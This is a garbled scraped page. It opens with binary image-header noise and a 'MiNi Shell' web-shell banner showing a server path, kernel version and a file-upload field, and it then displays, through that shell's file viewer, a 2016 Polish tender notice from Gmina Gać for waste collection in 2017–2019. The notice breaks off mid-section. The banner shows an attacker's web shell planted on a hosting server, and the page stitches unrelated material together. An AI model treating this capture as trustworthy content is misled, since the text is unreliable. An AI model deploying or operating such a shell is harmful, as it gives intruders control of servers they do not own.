JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161123/349513-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.gac.biuletyn.net' target='_blank'>www.gac.biuletyn.net</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 349513 - 2016
              z dnia 2016-11-23 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Gać: ODBIÓR, TRANSPORT I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH Z TERENU GMINY GAĆ 
W LATACH 2017- 2019<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Gać, krajowy numer identyfikacyjny
              65090064800000, ul.
              Gać 
              275,
              37207  
              Gać, woj.
              podkarpackie, państwo
              Polska, tel.
              166 411 429, e-mail
              , faks
              166 411 429.
              <br />
              Adres strony internetowej (URL): www.gac.pl<br />
                Adres profilu nabywcy:

                www.gac.biuletyn.net<br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.gac.biuletyn.net</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.gac.biuletyn.net</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie papierowej<br />
                Adres:
                <br />Urząd Gminy Gać, Gać 275; 37-207 Gać</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>ODBIÓR, TRANSPORT I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH Z TERENU GMINY GAĆ 
W LATACH 2017- 2019<br /><b>Numer referencyjny: </b>RGO.271.9.2016.MB<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Charakterystyka gminy Gać
	Powierzchnia Gminy Gać wynosi 3 595 ha. 
	Liczba mieszkańców w zabudowie jednorodzinnej  3953
	Liczba mieszkańców w zabudowie wielorodzinnej (Mikulice bloki)  64
	Liczba nieruchomości zamieszkałych  1140 (w tym 23 Mikulice bloki)
	Liczba nieruchomości niezamieszkałych - 41
W trakcie trwania Zamówienia przewiduje się wzrost lub zmniejszenie liczby nieruchomości zamieszkałych i niezamieszkałych z których będą odbierane odpady do 10 %. Wykaz nieruchomości z których należy zabrać odpady stanowi załącznik nr 11  i 12 do SIWZ. 
2.	Szczegółowy opis przedmiotu zamówienia
	Usługa wywozu zmieszanych odpadów komunalnych 
Przedmiot zamówienia obejmuje odbiór od właścicieli nieruchomości zamieszkałych 
i niezamieszkałych w tym budynków użyteczności publicznej odpadów zmieszanych, ich załadunek, transport i unieszkodliwienie w Regionalnej Instalacji Przetwarzania Odpadów wskazanej dla regionu centralnego w Wojewódzkim Planie Gospodarki Odpadami Województwa Podkarpackiego lub do Instalacji Zastępczej w przypadku braku instalacji regionalnej, wskazanej w obowiązującej uchwale Sejmiku Województwa Podkarpackiego     w sprawie wykonania Planu Gospodarki Odpadami dla Województwa Podkarpackiego. 
	Usługa wywozu odpadów zebranych selektywnie. 
 Przedmiot zamówienia obejmuje odbiór odpadów selektywnie zebranych od właścicieli nieruchomości  zamieszkałych i niezamieszkałych w tym budynków użyteczności publicznej, ich załadunek, transport i zagospodarowanie w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami następujących frakcji odpadów: 
1)	papier, tektura, opakowania z papieru i tektury 
2)	szkło, opakowania ze szkła 
3)	metale, opakowania z metalu 
4)	tworzywa sztuczne, opakowania z tworzyw sztucznych 
 Selektywna zbiórka odpadów komunalnych na terenie gminy Gać będzie się odbywać  w systemie workowym.

	Usługa wywozu odpadów ulęgających biodegradacji i odpady zielone.  Przedmiot zamówienia obejmuje odbiór od właścicieli nieruchomości zamieszkałych i niezamieszkałych odpadów biodegradowalnych, ich załadunek, transport  i zagospodarowanie w Regionalnej Instalacji Przetwarzania Odpadów.  Odbiór odpadów ulęgających biodegradacji na terenie zabudowy jednorodzinnej będzie się  odbywać  w systemie workowym.
	Usługa wywozu odpadów wielkogabarytowych i  zużytych opon  oraz sprzętu elektrycznego 
i elektronicznego. Przedmiot zamówienia obejmuje odbiór od właścicieli nieruchomości zamieszkałych i niezamieszkałych odpadów wielkogabarytowych  oraz zużytego sprzętu elektrycznego i elektronicznego, ich załadunek, transport i zagospodarowanie. Odbiór odpadów wielkogabarytowych, zużytych opon i zużytego sprzętu elektrycznego 
i elektronicznego  odbywać będzie się bezpośrednio z przed posesji właścicieli nieruchomości.
	Usługa wywozu odpadów rozbiórkowych i budowlanych oraz zimnego popiołu. Przedmiot zamówienia obejmuje odbiór od właścicieli nieruchomości zamieszkałych i niezamieszkałych odpadów rozbiórkowych i budowlanych, ich załadunek, transport i zagospodarowanie 
w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami innych niż niebezpieczne odpadów budowlanych i rozbiórkowych. 
	Odbieranie niebezpiecznych odpadów komunalnych tj. rozpuszczalniki, kwasy, alkalia, lampy fluoroscencyjne, oleje tłuszcze, farby, tusze, baterie i akumulatory, środki ochrony roślin. Odbiór niebezpiecznych odpadów komunalnych  odbywać się będzie bezpośrednio z przed posesji właściciela  nieruchomości, zorganizowanie odbioru baterii zgromadzonych w pojemnikach rozlokowanych w urzędzie i placówkach oświatowych. 
	Odpady niebezpieczne typu leki. Przeterminowane lub zużyte leki będą odbierane z aptek zlokalizowanych na terenie Gminy Gać.
	Dostarczenie do nieruchomości zamieszkałych i niezamieszkałych worków o pojemności 120 l do selektywnej zbiórki odpadów oraz odpadów biodegradowalnych:  (z wyłączeniem Mikulice bloki) 
1)	papier, tektura, opakowania z papieru i tektury 
2)	szkło, opakowania ze szkła 
3)	metale, opakowania z metalu 
4)	tworzywa sztuczne, opakowania z tworzyw sztucznych 
5)	odpady biodegradowalne 
6)	Odpady budowlane i rozbiórkowe 

	Wykonawca nieodpłatnie dostarczy i wyposaży  w terminie do 2 stycznia 2017r. .właścicieli nieruchomości zamieszkałych i nieruchomości niezamieszkałych w komplet worków  
o pojemność 120 l zgodnie z wykazem stanowiącym załącznik nr 11 i 12 do SIWZ z podziałem na następujące frakcje, kolory i rozmiary:
- żółty  z nadrukiem przeznaczony na tworzywa sztuczne i opakowania wielomateriałowe,
- czerwony z nadrukiem przeznaczony na metale,
- biały z nadrukiem przeznaczony na szkło bezbarwne
- zielony z nadrukiem przeznaczony na szkło  kolorowe, 
- niebieski z nadrukiem przeznaczony na papier i tekturę, 
- brązowy z nadrukiem przeznaczony na odpady biodegradowalne,
- szary z nadrukiem przeznaczony na zimny popiół,

Worki należy przekazywać na bieżąco właścicielowi nieruchomości w zależności od potrzeb właścicieli nieruchomości  w systemie: za każdy odebrany worek danej frakcji odpadów Wykonawca pozostawia worek pusty.
	Dostarczenie na okres zamówienia pojemników  o min. pojemności 1100 L, na odpady pochodzące z selektywnej zbiórki  oraz odpady biodegradowalne a także budowlane i rozbiórkowe - po 2 pojemniki na każdą frakcję. Pojemniki muszą być przystosowane do użytku zewnętrznego. Miejsce dostarczenia  Mikulice bloki. Pojemniki należy dostarczyć w terminie do dnia 2 stycznia 2017r. 
3.	Wielkość, terminy i częstotliwość usługi: 
	Zamówienie obejmuje okres od 01.01.2017 do 31.12.2019r. 
	Wielkość zmieszanych odpadów komunalnych określa się według obliczeń szacunkowych na okres  od 01.01.2017 do 31.12.2019r tj.  750 Mg. 
	Wielkość selektywnie zbieranych odpadów określa się według obliczeń szacunkowych na okres od 01.01.2017 do 31.12.2019 r tj.:
1)	papier i tektura, opakowania z papieru i  tektury  15  Mg
2)	szkło, opakowania ze szkła   180  Mg
3)	metal, opakowania z metali   27 Mg
4)	tworzywa sztuczne, opakowania z tworzyw sztucznych   150 Mg
5)	odpady biodegradowalne    30 Mg
6)	sprzęt elektryczny i elektroniczny  12  Mg
7)	odpady wielkogabarytowe  38 Mg
8)	odpady rozbiórkowe i budowlane 15   Mg
9)	zużyte opony 38 Mg
10)	 zużyte baterie i akumulatory- 1 Mg
11)	 Opakowania po środkach ochrony roślin  2 Mg
	Częstotliwość wywozu odpadów dla zabudowy jednorodzinnej i wielorodzinnej w tym nieruchomości niezamieszkałych: 
1)	odpady zmieszane  1 raz w miesiącu,
2)	odpady zbierane selektywnie  1 raz w miesiącu, 
3)	odpady biodegradowalne    2 razy w miesiącu z miejscowości Mikulice - bloki, 
z pozostałych nieruchomości 1 raz w miesiącu,
4)	odpady wielkogabarytowe, sprzęt elektryczny i elektroniczny, odpady budowlane i rozbiórkowe, zużyte opony  2 razy w roku
5) niebezpieczne odpady komunalne tj. rozpuszczalniki, kwasy, alkalia, lampy fluoroscencyjne, oleje tłuszcze, farby , tusze, baterie i akumulatory, środki ochrony roślin   2 razy w roku.
6)   odpady niebezpieczne typu leki  1 raz na kwartał

	Odbiór odpadów zmieszanych i segregowanych od mieszkańców gminy   prowadzony będzie według harmonogramu opracowanego przez Wykonawcę wyłonionego w drodze przetargu i uzgodnionego z Zamawiającym. Powyższy harmonogram Wykonawca przekaże Zamawiającemu w terminie 7  dni od podpisania Umowy. 
	Usługa wywozu odpadów poza Harmonogramem, na zgłoszenie właściciela nieruchomości będzie odbywać się odpłatnie na podstawie umowy między Wykonawcą i właścicielem nieruchomości.
	Zbiórka odpadów komunalnych powinna odbywać się bezpośrednio z nieruchomości na której zamieszkują mieszkańcy lub nieruchomości niezamieszkałej lub w przypadku utrudnień wynikających z warunków atmosferycznych z miejsc wspólnego złożenia pojemników i worków przy drogach publicznych.
	Wykonawca od właścicieli nieruchomości zamieszkałych i niezamieszkałych odbiera odpady komunalne zmieszane, odpady zbierane w sposób selektywny, odpady wielkogabarytowe, zużyty sprzęt elektryczny i elektroniczny, zużyte baterie, inne niż niebezpieczne odpady budowlane i rozbiórkowe, zużyte opony,  odpady zielone, zimny popiół oraz złożone w Punkcie Selektywnego Zbierania Odpadów Komunalnych  w każdej ilości. 
	Wykonawca jest zobowiązany do odbierania odpadów komunalnych w terminach wynikających z przyjętego harmonogramu odbioru, niezależnie od warunków atmosferycznych, w sposób nie zakłócający spoczynku nocnego, pojazdami przystosowanymi do odbierania poszczególnych  frakcji odpadów  oraz w sposób wykluczający mieszanie odpadów. Wykonawca zobowiązany jest do odbierania w sposób zapewniający utrzymanie odpowiedniego stanu sanitarnego, w szczególności zapobiegania wysypywaniu się odpadów z pojemników i worków podczas dokonywania odbioru. 

4.	Odpady odbierane z terenu gminy gromadzone będą w następujących urządzeniach i pojemnikach: 
	odpady zmieszane w pojemnikach o pojemności: 120 l  nieruchomości zamieszkałe, 120 l, 240 L, 1100 l  nieruchomości niezamieszkałe,
	odpady segregowane: worki o pojemności 120 l,
	odpady segregowane z terenu Mikulice bloki: pojemniki o pojemności min. 1 100 L. 

5.	Wykonawca jest zobowiązany do zebrania także odpadów komunalnych zmieszanych i segregowanych leżących obok pojemników do gromadzenia odpadów jeżeli odpady te będą zgromadzone w workach innych niż te które dostarczył Wykonawca. 
6.	Wykonawca zobowiązany jest do wywozu odpadów zmieszanych bądź selektywnych na dodatkowe zlecenie Zamawiającego poza ustalonym harmonogramem z ustalonych miejsc, z wyłączeniem nieruchomości zamieszkałych  maksymalnie do 4 dodatkowych zleceń w ciągu roku. 
7.	Wykonawca jest zobowiązany do mycia pojemników na odpady biodegradowalne w miejscowości Mikulice  1 raz na kwartał. 
8.	 W celu osiągnięcia poziomów recyklingu, przygotowania do ponownego użycia i odzysku wskazanych frakcji odpadów, Wykonawca obowiązany jest do maksymalnego ułatwienia mieszkańcom nieruchomości pozbywania się odpadów papieru i tektury, tworzyw sztucznych, szkła i metali powstających na terenie nieruchomości zamieszkałych i niezamieszkałych   m.in. poprzez odbieranie w/w odpadów zebranych w sposób selektywny  u źródła.  
9.	 Wykonawca zobowiązany jest do zagospodarowania odpadów z zachowaniem wskaźników odzysku lub unieszkodliwienia zabranych odpadów komunalnych zgodnie z ustawą o odpadach oraz ustawą o utrzymaniu czystości i porządku w gminach w zakresie:
	osiągnięcia wskaźnika w wysokości  20 (w 2017r.) 30 (w 2018r.) 40 ( w 2019r.)w odniesieniu do masy odebranych przez siebie odpadów komunalnych, poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami papieru, metalu, tworzyw sztucznych, szkła zgodnie z  Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r., poz. 645), 
	osiągnięcia wskaźnika w wysokości 45 (w 2017r.) 50 (w 2018r.)  60 ( w 2019r.) w odniesieniu do masy odebranych przez siebie odpadów komunalnych, poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami innych niż niebezpieczne odpadów budowlanych i rozbiórkowych zgodnie z  Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r., poz. 645), 
	osiągnięcia wskaźnika w wysokości 45 (w 2017r.) 40 (w 2018r.)  40 (w 2019r.) dopuszczalnego poziomu masy opadów komunalnych ulegających biodegradacji przekazywanych do składowania w stosunku do masy tych odpadów wytworzonych w 1995r. w roku rozliczeniowym   zgodnie z Rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U. z 2012 r., poz. 676.

10.	Wykonawca jest zobowiązany do informowania zamawiającego o każdym przypadku braku selektywnego zbierania odpadów przez właścicieli nieruchomości. Wykonawca przed zakwalifikowaniem odpadów segregowanych do zmieszanych wynikającym z niedopełnienia przez mieszkańca obowiązku selektywnego zbierania odpadów komunalnych, sporządza na tą okoliczność dokumentację (oświadczenie wraz z notatką, dokumentacja fotograficzna) umożliwiającą wydanie przez Zamawiającego decyzji administracyjnej naliczającej zmianę wysokości opłaty. Wykaz numerów identyfikacyjnych nieruchomości wraz z dokumentacją poświadczającą nieprawidłową segregację odpadów, Wykonawca przekaże niezwłocznie zamawiającemu. 
11.	Trasy zbiórki odpadów przebiegają po drogach wojewódzkich, powiatowych, gminnych a także wewnętrznych drogach dojazdowych. Wykonawca jest zobowiązany dotrzeć do wszystkich osób wytwarzających odpady lub do miejsc ich gromadzenia i zebrać wszystkie odpady zgromadzone w pojemnikach lub workach. 
12.	 Przed złożeniem oferty Wykonawca zobowiązany jest do zapoznania się z siecią dróg oraz zabudową na terenie Gminy Gać celem określenia długości tras przejazdu śmieciarek. 
13.	 Podana ilość odbioru odpadów stanowi wielkość orientacyjną, ilości te zostały podane w celu sporządzenia oferty. Faktyczne ilości odpadów mogą nie pokrywać się z podanymi przez Zamawiającego. Zakłada się że ilości odbieranych odpadów może wzrosnąć do około 15 %. Z tytułu zwiększenia ilości wywożonych odpadów Zamawiający nie będzie ponosił dodatkowych kosztów. 
14.	Wykonawca będzie prowadził i przedkładał Zamawiającemu dokumentację z realizacji przedmiotu zamówienia, tj.: 
	podawanie ilościowej i jakościowej ewidencji odpadów zgodnie z przepisami ustawy  
o odpadach oraz utrzymaniu czystości w gminach.
	przekazywanie Zamawiającemu zgodnie z ustawą o utrzymaniu  czystości i porządku 
w gminach do końca miesiąca następującego  po upływie  półrocza, pisemnych  półrocznych sprawozdań .

15.	Odbiór odpadów komunalnych od właścicieli nieruchomości powinien odbywać się zgodnie ze szczegółowym planem wywozu określonym w harmonogramie.
16.	Wykonawca winien przeprowadzać odbiór odpadów komunalnych w dni robocze od poniedziałku do piątku. Dopuszcza się uzasadnionych przypadkach i po wcześniejszym uzgodnieniu z Zamawiającym odbieranie odpadów w soboty , bądź inne dni wolne od pracy.
17.	Wykonawca zobowiązany będzie do obsługiwania od dnia obowiązywania umowy Punktu Selektywnego Zbierania Odpadów Komunalnych (PSZOK)położonego na terenie gminy Gać.
18.	W ramach zagospodarowania odpadów Wykonawca zobowiązany jest do przekazania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości  z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnej lub zastępczej regionalnej instalacji do przetwarzania odpadów komunalnych  właściwej do regionu centralnego województwa podkarpackiego zgodnie z uchwałą nr XXIV/409/12 z dnia 27 sierpnia 2012r. w sprawie przyjęcia projektu Wojewódzkiego Planu Gospodarki Odpadami dla Województwa Podkarpackiego i uchwalenia Wojewódzkiego Planu Gospodarki Odpadami dla Województwa Podkarpackiego.
19.	W przypadku   selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania odpadów, Wykonawca zobowiązany jest do ich przekazania do instalacji odzysku  i unieszkodliwienia , zgodnie z przepisami ustawy z dnia 27 kwietnia 2001r. o odpadach. 
20.	Zagospodarowanie i odbieranie odpadów powinno być zgodne z obowiązującymi przepisami prawnymi, w   szczególności z:

	Ustawą z dnia 14 grudnia 2012 r. o odpadach ( Dz. U z 2013 r. poz. 21 j.t)
	Ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w Gminach (Dz. U.z 2016r. poz. 250 ze zm.)
	Ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska ( Dz. U. z 2016r. poz. 672 ze zm.). 
	Uchwałą Nr XXIV/410/12 Sejmiku Województwa Podkarpackiego z dnia 27 sierpnia 2012 r. w sprawie wykonania Planu Gospodarki Odpadami dla Województwa Podkarpackiego,
	Uchwałą Nr X/56/2015 Rady Gminy Gać z dnia 20 sierpnia 2015r.w sprawie uchwalenia Regulaminu utrzymania czystości i porządku na terenie Gminy Gać, 
	Uchwałą X/57/2015 z dnia 20 sierpnia 2015r. w sprawie określenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi.
	Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122), 
	Rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 r., w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r., poz. 630)
	Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r., poz. 645), 
	Rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U. z 2012 r., poz. 676)<br /><br /><b>II.5) Główny kod CPV: </b>90513100-7<br /><b> Dodatkowe kody CPV:</b>90511000-2,
                90512000-9,
                90514000-3<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
